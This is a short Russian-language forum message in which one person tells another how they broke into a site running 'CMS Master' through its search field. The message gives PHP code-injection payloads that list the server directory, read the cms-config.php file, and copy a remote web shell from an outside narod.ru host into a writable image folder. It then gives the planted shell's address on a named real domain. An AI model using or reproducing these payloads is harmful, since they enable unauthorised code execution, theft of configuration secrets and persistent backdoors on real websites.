Хо хо... Поздравляю =) Ты нашел дыру в некой

// CMS Master :: Content management system
// File: /cms-config.php
// Version: 1.0
// Created date: 28 September 2003
// Modification date: 28 September 2003

пока еще не смотрел че за дыра, но скорей всего либо поиск через кривую регулярку он юзает, либо через какуюнить системную функцию. Короче. Ввел в поиск:
<?$dir=\'./\';$dir=substr($dir,0,strlen($dir)-1);if ($handle = opendir($dir)) {while (false !== ($file = readdir($handle))) {echo \"$file\n\";} closedir($handle);} ?>
получил листинг дириктории. Заметил файл cms-config.php, проглядел его. Вбил в поиск:
<?$file=\'cms-config.php\';$file=substr($file,0,strlen($file)-1);readfile($file);?>
Там каталог cms-images. Не факт, но обычно такие каталоги имеют права на запись. Решил попробовать туда кинуть ченить, шелл например. Вбиваю:
<?$f1=\'http://www.zerkalodeface.narod.ru/rem.php3\';$f2=\'./cms-images/rem.php\';$f1=substr($f1,0,strlen($f1)-1);$f2=substr($f2,0,strlen($f2)-1);copy($f1,$f2);?>
Ну и шелл соответственно по адресу http://a-count.ru/cms-images/rem.php?c=t Все, дальше сам. А я пойду погляжу в чем, собственно, дырка.